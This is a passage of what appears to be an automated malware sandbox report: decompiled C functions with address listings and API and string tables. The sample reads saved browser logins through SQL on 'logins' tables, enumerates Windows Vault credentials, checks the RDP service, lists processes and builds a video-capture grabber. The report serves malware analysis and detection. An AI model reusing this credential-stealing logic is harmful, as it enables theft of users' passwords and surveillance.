							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
							__eflags =  *_t191;
							if( *_t191 != 0) {
								E00403237( &_a12, E004034D1( &_v68, _t191));
								E00405FEB(_v68);
							}
							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
							_t194 = E0040C6BD( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
							_t340 = _t340 - 0xc + 0x24;
							E00403237( &_a16, E004034D1( &_v72, _t194));
							E00405FEB(_v72);
							_t198 = E0040319E( &_a12);
							__eflags = _t198;
							if(_t198 > 0) {
								L26:
								_v88 = 0;
								_v84 = 0;
								_v80 = 0;
								__eflags = E0040319E( &_a4);
								if(__eflags > 0) {
									E00403549( &_v88, E004031AF( &_a4, __eflags,  &_v36));
									E00405FEB(_v36);
									_v36 = 0;
								}
								__eflags = E0040319E( &_a12);
								if(__eflags > 0) {
									E00403549( &_v84, E004031AF( &_a12, __eflags,  &_v40));
									E00405FEB(_v40);
									_v40 = 0;
								}
								__eflags = E0040319E( &_a16);
								if(__eflags != 0) {
									E00403549( &_v80, E004031AF( &_a16, __eflags,  &_v44));
									E00405FEB(_v44);
									_v44 = 0;
								}
								_t340 = _t340 - 0x10;
								_v76 = _a20;
								E00401FF2(_t340,  &_v88);
								E00402028(_t338);
								E00401441( &_v88);
							} else {
								_t223 = E0040319E( &_a16);
								__eflags = _t223;
								if(_t223 <= 0) {
									goto L33;
								}
								goto L26;
							}
							L33:
							E00405FEB(_a12);
							E00405FEB(_v48);
							E00405FEB(_t335);
							E00405FEB(_a16);
							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
							_pop(_t268);
							_t331 = 1;
							__eflags = _t178 - 0x64;
						} while (_t178 == 0x64);
						_t337 = _v28;
						_t233 = _v52;
						goto L35;
					}
					L11:
					E0040373F(_t340,  &_v12);
					E0041142A(_t268);
					E0040373F(_t340,  &_v20);
					E0041142A();
					goto L12;
				}
			}



















































                                  0x0040bc0d
                                  0x0040bc13
                                  0x0040bc17
                                  0x0040bc1e
                                  0x0040bc25
                                  0x0040bc26
                                  0x0040bc29
                                  0x0040bc2e
                                  0x0040bc37
                                  0x0040bc3e
                                  0x0040bc4b
                                  0x0040bc53
                                  0x0040bc58
                                  0x0040bc61
                                  0x0040bc68
                                  0x0040bc6c
                                  0x0040bc75
                                  0x0040bc7c
                                  0x0040bc89
                                  0x0040bc91
                                  0x0040bc9a
                                  0x0040bc9f
                                  0x0040bca3
                                  0x0040bca6
                                  0x0040bcac
                                  0x0040bca8
                                  0x0040bca8
                                  0x0040bca8
                                  0x0040bcae
                                  0x0040bcb8
                                  0x0040bcc0
                                  0x0040bccb
                                  0x0040bcd0
                                  0x0040bcd4
                                  0x0040bcd7
                                  0x0040bcdd
                                  0x0040bcd9
                                  0x0040bcd9
                                  0x0040bcd9
                                  0x0040bcdf
                                  0x0040bce9
                                  0x0040bcf1
                                  0x0040bcfc
                                  0x0040bd0a
                                  0x0040bd0c
                                  0x0040bd11
                                  0x0040bd8d
                                  0x0040bd8d
                                  0x00000000
                                  0x0040bd3a
                                  0x0040bd41
                                  0x0040bd4d
                                  0x0040bd58
                                  0x0040bd5d
                                  0x0040bd62
                                  0x0040bd69
                                  0x0040bdb7
                                  0x0040bdbe
                                  0x0040bdcb
                                  0x0040bdd2
                                  0x0040bdd5
                                  0x0040bdd6
                                  0x0040bdd8
                                  0x0040c017
                                  0x0040c01a
                                  0x0040c021
                                  0x0040c02a
                                  0x0040c02f
                                  0x0040c03a
                                  0x0040c03f
                                  0x0040bd8f
                                  0x0040bd92
                                  0x0040bd9a
                                  0x0040bda1
                                  0x0040bda9
                                  0x0040bdb4
                                  0x0040bdb4
                                  0x0040bdde
                                  0x0040bdf4
                                  0x0040bdfb
                                  0x0040bdfe
                                  0x0040be01
                                  0x0040be03
                                  0x00000000
                                  0x00000000
                                  0x0040be0c
                                  0x0040be0f
                                  0x0040be10
                                  0x0040be13
                                  0x0040c00f
                                  0x0040c00f
                                  0x0040c011
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040c011
                                  0x0040be19
                                  0x0040be1b
                                  0x0040be24
                                  0x0040be2e
                                  0x0040be31
                                  0x0040be3d
                                  0x0040be40
                                  0x0040be4a
                                  0x0040be4d
                                  0x0040be52
                                  0x0040be55
                                  0x0040be64
                                  0x0040be6c
                                  0x0040be71
                                  0x0040be71
                                  0x0040be78
                                  0x0040be7d
                                  0x0040be80
                                  0x0040be8f
                                  0x0040be97
                                  0x0040be97
                                  0x0040bea1
                                  0x0040bea6
                                  0x0040bea9
                                  0x0040beb8
                                  0x0040bec0
                                  0x0040bec0
                                  0x0040bed3
                                  0x0040bee7
                                  0x0040beec
                                  0x0040befc
                                  0x0040bf04
                                  0x0040bf0c
                                  0x0040bf11
                                  0x0040bf13
                                  0x0040bf25
                                  0x0040bf2a
                                  0x0040bf2d
                                  0x0040bf30
                                  0x0040bf38
                                  0x0040bf3a
                                  0x0040bf4c
                                  0x0040bf54
                                  0x0040bf59
                                  0x0040bf59
                                  0x0040bf64
                                  0x0040bf66
                                  0x0040bf78
                                  0x0040bf80
                                  0x0040bf85
                                  0x0040bf85
                                  0x0040bf90
                                  0x0040bf92
                                  0x0040bfa4
                                  0x0040bfac
                                  0x0040bfb1
                                  0x0040bfb1
                                  0x0040bfb7
                                  0x0040bfba
                                  0x0040bfc3
                                  0x0040bfca
                                  0x0040bfd2
                                  0x0040bf15
                                  0x0040bf18
                                  0x0040bf1d
                                  0x0040bf1f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bf1f
                                  0x0040bfd7
                                  0x0040bfda
                                  0x0040bfe2
                                  0x0040bfe9
                                  0x0040bff1
                                  0x0040bff9
                                  0x0040bffc
                                  0x0040bfff
                                  0x0040c000
                                  0x0040c000
                                  0x0040c009
                                  0x0040c00c
                                  0x00000000
                                  0x0040c00c
                                  0x0040bd6b
                                  0x0040bd72
                                  0x0040bd77
                                  0x0040bd82
                                  0x0040bd87
                                  0x00000000
                                  0x0040bd8c

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD0A
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD14
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD28
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD34
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                    • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                    • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB,?,00403620,00000000,?,?), ref: 004031A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                  • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                  • API String ID: 881303001-3832748974
                                  • Opcode ID: 329386fcc83a84891d4b278b7fe8d1562402ffa047f16b59ee941d1b038bb962
                                  • Instruction ID: ba20cf8de6aee4928ce48004bd15a5688bda43775cfbd645d5ca8aed8c6f7f47
                                  • Opcode Fuzzy Hash: 329386fcc83a84891d4b278b7fe8d1562402ffa047f16b59ee941d1b038bb962
                                  • Instruction Fuzzy Hash: 9AD10B71900109ABDB05EFA6DC92AEEBB79EF44309F10413EF512B61E1DF389A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACBE, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0040ACBE(void* __ecx) {
				struct HINSTANCE__* _t17;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t27;
				void* _t45;

				_t27 = __ecx;
				_t45 = __ecx;
				_t17 = LoadLibraryA("vaultcli.dll");
				 *(_t45 + 0xc0) = _t17;
				_t46 = _t17;
				if(_t17 == 0) {
					L7:
					__eflags = 0;
					return 0;
				} else {
					_push(_t27);
					 *((intOrPtr*)(_t45 + 0x8c)) = E00411E88(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E00411E88( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E00411E88( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E00411E88( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E00411E88( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E00411E88( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}








                                  0x0040acbe
                                  0x0040acc4
                                  0x0040acc6
                                  0x0040accc
                                  0x0040acd2
                                  0x0040acd4
                                  0x0040ad88
                                  0x0040ad88
                                  0x0040ad8b
                                  0x0040acda
                                  0x0040acdb
                                  0x0040acf3
                                  0x0040ad09
                                  0x0040ad0f
                                  0x0040ad1a
                                  0x0040ad21
                                  0x0040ad34
                                  0x0040ad4a
                                  0x0040ad50
                                  0x0040ad58
                                  0x0040ad65
                                  0x00000000
                                  0x0040ad83
                                  0x0040ad87
                                  0x0040ad87
                                  0x0040ad65

                                  APIs
                                  • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadlstrcmp
                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                  • API String ID: 2493137890-3967309459
                                  • Opcode ID: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction ID: 2a90ba8d4adaf7cda04c615fa43a8d23c2bd42836fdc2a547e2a1ab5da71d687
                                  • Opcode Fuzzy Hash: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction Fuzzy Hash: 24114235A017018BD7249B71A801BDBB3E6AF85341F54893F986E97781DF38A882CB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EFC1, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E0040EFC1(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				char* _t8;
				void* _t11;
				void* _t16;
				short* _t19;

				_t19 = 0;
				_v8 = __edx;
				_t16 = OpenSCManagerW(0, L"ServicesActive", 1);
				if(_t16 != 0) {
					_t11 = OpenServiceW(_t16, L"TermService", 4);
					if(_t11 != 0) {
						_t8 =  &_v12;
						__imp__QueryServiceStatusEx(_t11, 0, _v8, 0x24, _t8);
						_t19 = _t8;
						CloseServiceHandle(_t11);
					}
					CloseServiceHandle(_t16);
				}
				return _t19;
			}









                                  0x0040efcf
                                  0x0040efd1
                                  0x0040efdb
                                  0x0040efdf
                                  0x0040eff0
                                  0x0040eff4
                                  0x0040eff6
                                  0x0040f001
                                  0x0040f008
                                  0x0040f00a
                                  0x0040f00a
                                  0x0040f011
                                  0x0040f017
                                  0x0040f01d

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0040E78B), ref: 0040EFD5
                                  • OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0040E78B), ref: 0040EFEA
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0040E78B), ref: 0040F001
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F00A
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F011
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                  • String ID: ServicesActive$TermService
                                  • API String ID: 2623946379-1374911754
                                  • Opcode ID: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction ID: 13b6eb68be2015eef051f6e1ac84f9e35e5ae5cb34c12eee95212088573f76c3
                                  • Opcode Fuzzy Hash: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                  • Instruction Fuzzy Hash: C4F0B472240310BBD7214BA5AC8DEEB7EBCEB8DB50B104175F701A2140DAB48D009668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DE9, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00405DE9(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}





                                  0x00405def
                                  0x00405dfd
                                  0x00405e06
                                  0x00405e0a
                                  0x00405e1d
                                  0x00405e1d
                                  0x00405e21
                                  0x00405e21
                                  0x00405e27

                                  APIs
                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405DF1
                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,?,?,?,?,?,?,?,00405B9D,?,00000000,.bss), ref: 00405DFD
                                  • ExitProcess.KERNEL32 ref: 00405E21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressExitLibraryLoadProcProcess
                                  • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                  • API String ID: 881411216-1361702557
                                  • Opcode ID: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction ID: 25954cca20eb1c260ad7c814922471eb5b696a72d0fb51094525e610711aea92
                                  • Opcode Fuzzy Hash: 665e447c18dd6cd14c29f9c8afe208bf82788663ec83304a93180c0f2cc759b1
                                  • Instruction Fuzzy Hash: E5D017707C93003AEA1037A0AC4EFD737348B45B51F244462BA45A61D1C9E98986C9AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004122CA, Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E004122CA(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				struct tagPROCESSENTRY32W* _t57;
				int _t73;
				int _t77;
				int _t89;
				void* _t91;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t119;
				void* _t120;
				signed int _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;

				_t125 = __eflags;
				_t112 = __edx;
				_t91 = __ecx;
				E00401052( &_v600, 0, 0x228);
				_t124 = _t123 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E00401735( &_v44, _t125);
				_t113 = CreateToolhelp32Snapshot(2, 0);
				if(_t113 == 0xffffffff) {
					L14:
					E0040136C(_t91, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t119 =  *(_t54 - 4);
						_t115 = _t119 * 0xc + _t54;
						__eflags = _t119;
						if(_t119 != 0) {
							do {
								_t115 = _t115 - 0xc;
								E00401468(_t115);
								_t119 = _t119 - 1;
								__eflags = _t119;
							} while (_t119 != 0);
						}
					}
				} else {
					_t57 =  &_v604;
					Process32FirstW(_t113, _t57);
					_t127 = _t57;
					if(_t57 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E00403411( &_v12, _t112,  &_v568);
							_t120 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t120 - 0xffffffff;
							if(_t120 == 0xffffffff) {
								E00403549( &_v8, E004036F7( &_v28, "-"));
								E00405FEB(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E00401052( &_v1644, 0, 0x410);
								_t124 = _t124 + 0xc;
								_t77 =  &_v1644;
								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
								__eflags = _t77;
								if(_t77 == 0) {
									E00403549( &_v8, E004036F7( &_v24, "-"));
									E00405FEB(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E00403549( &_v8, E004036F7( &_v20,  &_v1644));
									E00405FEB(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t120);
							}
							_t124 = _t124 - 0xc;
							_t121 = _t124;
							 *_t124 = _v16;
							E0040373F(_t121 + 4,  &_v12);
							E0040373F(_t121 + 8,  &_v8);
							E00401612( &_v44);
							E00401468( &_v16);
							_t73 = Process32NextW(_t113,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t73;
						} while (__eflags != 0);
						CloseHandle(_t113);
						goto L14;
					} else {
						CloseHandle(_t113);
						E0040136C(_t91, _t127,  &_v44);
						_t89 = _v44;
						if(_t89 != 0) {
							_t122 =  *(_t89 - 4);
							_t117 = _t122 * 0xc + _t89;
							if(_t122 != 0) {
								do {
									_t117 = _t117 - 0xc;
									E00401468(_t117);
									_t122 = _t122 - 1;
								} while (_t122 != 0);
							}
						}
					}
				}
				return _t91;
			}



































                                  0x004122ca
                                  0x004122ca
                                  0x004122e5
                                  0x004122e7
                                  0x004122ec
                                  0x004122ef
                                  0x004122fc
                                  0x00412301
                                  0x00412302
                                  0x00412305
                                  0x00412308
                                  0x00412316
                                  0x0041231b
                                  0x004124a3
                                  0x004124a9
                                  0x004124ae
                                  0x004124b1
                                  0x004124b3
                                  0x004124b5
                                  0x004124bb
                                  0x004124bd
                                  0x004124bf
                                  0x004124c1
                                  0x004124c1
                                  0x004124c6
                                  0x004124cb
                                  0x004124cb
                                  0x004124cb
                                  0x004124c1
                                  0x004124bf
                                  0x00412321
                                  0x00412321
                                  0x00412329
                                  0x0041232f
                                  0x00412331
                                  0x00412374
                                  0x0041237d
                                  0x00412387
                                  0x0041238a
                                  0x0041238d
                                  0x004123a4
                                  0x004123a6
                                  0x004123a9
                                  0x00412440
                                  0x00412448
                                  0x0041244d
                                  0x0041244d
                                  0x0041244d
                                  0x004123af
                                  0x004123bd
                                  0x004123c2
                                  0x004123c5
                                  0x004123d4
                                  0x004123da
                                  0x004123dc
                                  0x00412415
                                  0x0041241d
                                  0x00412422
                                  0x00412422
                                  0x00412422
                                  0x004123de
                                  0x004123f1
                                  0x004123f9
                                  0x004123fe
                                  0x004123fe
                                  0x00412427
                                  0x00412427
                                  0x00412454
                                  0x00412457
                                  0x00412459
                                  0x00412462
                                  0x0041246e
                                  0x00412476
                                  0x0041247e
                                  0x0041248b
                                  0x00412491
                                  0x00412493
                                  0x00412494
                                  0x00412494
                                  0x0041249d
                                  0x00000000
                                  0x00412333
                                  0x00412334
                                  0x00412340
                                  0x00412345
                                  0x0041234a
                                  0x00412350
                                  0x00412356
                                  0x0041235a
                                  0x00412360
                                  0x00412360
                                  0x00412365
                                  0x0041236a
                                  0x0041236a
                                  0x0041236f
                                  0x0041235a
                                  0x0041234a
                                  0x00412331
                                  0x004124d6

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412310
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412329
                                  • CloseHandle.KERNEL32(00000000), ref: 00412334
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0041239E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004123D4
                                  • CloseHandle.KERNEL32(00000000), ref: 00412427
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041248B
                                  • CloseHandle.KERNEL32(00000000), ref: 0041249D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                  • String ID:
                                  • API String ID: 3514491001-0
                                  • Opcode ID: 1ee9c4b895ebd49d63df65d356c6f6dd768b9f1af522058275ca50f077a8b9ef
                                  • Instruction ID: 76f310ec451ec7d85fc7bdc68f8874500a32d320933bf00d65e3e2fac8afd17e
                                  • Opcode Fuzzy Hash: 1ee9c4b895ebd49d63df65d356c6f6dd768b9f1af522058275ca50f077a8b9ef
                                  • Instruction Fuzzy Hash: 86519472D00219ABCB10EBA5CD49AEF7B78AF54719F00017AF405B32D0DB789E85CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412155, Relevance: 12.0, APIs: 8, Instructions: 45processstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412155(WCHAR** __ecx) {
				short _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				WCHAR* _t9;
				WCHAR** _t17;
				void* _t19;

				_t17 = __ecx;
				_v560 = 0x22c;
				_t19 = CreateToolhelp32Snapshot(2, 0);
				if(_t19 == 0xffffffff) {
					L6:
					return 0;
				}
				_t8 =  &_v560;
				Process32FirstW(_t19, _t8);
				while(_t8 != 0) {
					_t9 = CharLowerW( *_t17);
					if(lstrcmpW(CharLowerW( &_v524), _t9) == 0) {
						CloseHandle(_t19);
						return _v552;
					}
					_t8 = Process32NextW(_t19,  &_v560);
				}
				CloseHandle(_t19);
				goto L6;
			}










                                  0x00412164
                                  0x00412166
                                  0x00412176
                                  0x0041217b
                                  0x004121c7
                                  0x00000000
                                  0x004121c7
                                  0x0041217d
                                  0x00412185
                                  0x004121bc
                                  0x0041218f
                                  0x004121ac
                                  0x004121ce
                                  0x00000000
                                  0x004121d4
                                  0x004121b6
                                  0x004121b6
                                  0x004121c1
                                  0x00000000

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                  • CharLowerW.USER32(00000000), ref: 0041218F
                                  • CharLowerW.USER32(?), ref: 0041219D
                                  • lstrcmpW.KERNEL32(00000000,?,00000000), ref: 004121A4
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004121B6
                                  • CloseHandle.KERNEL32(00000000), ref: 004121C1
                                  • CloseHandle.KERNEL32(00000000), ref: 004121CE
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
                                  • String ID:
                                  • API String ID: 1363071124-0
                                  • Opcode ID: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction ID: 4666fb41372ad6f73eaae79bd09a069f05ab8e19623d47d36fdabbe8d344061e
                                  • Opcode Fuzzy Hash: 7127dcae3be97b314b06170a2d2ab854ee7541e6bcbe1cc0915e3935ee5c82da
                                  • Instruction Fuzzy Hash: 9B018F71505224BBD711ABB4AC4CEDF7BBCEB09351F1481A1FA01D2290D77889928B7D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414CB1, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 52%
                                  			E00414CB1(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t111 = __ecx + 0x18;
				__imp__CoCreateInstance(0x4175c0, 0, 1, 0x41a79c, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t104 = __ecx + 0x1c;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x4175a0, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t112 = __ecx + 0x20;
						if(_t112 != 0) {
							_t49 = E00414A12(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t113 = _t76 + 0x24;
							__imp__CoCreateInstance(0x417610, 0, 1, 0x41a78c, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E00401052( &_v128, 0, 0x48);
								_t58 =  *((intOrPtr*)(_t76 + 0x18));
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E0041462F();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E0041464B();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t85 =  *((intOrPtr*)(_t76 + 0x24));
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
										if(_t49 >= 0) {
											_t60 =  *((intOrPtr*)(_t76 + 0x18));
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
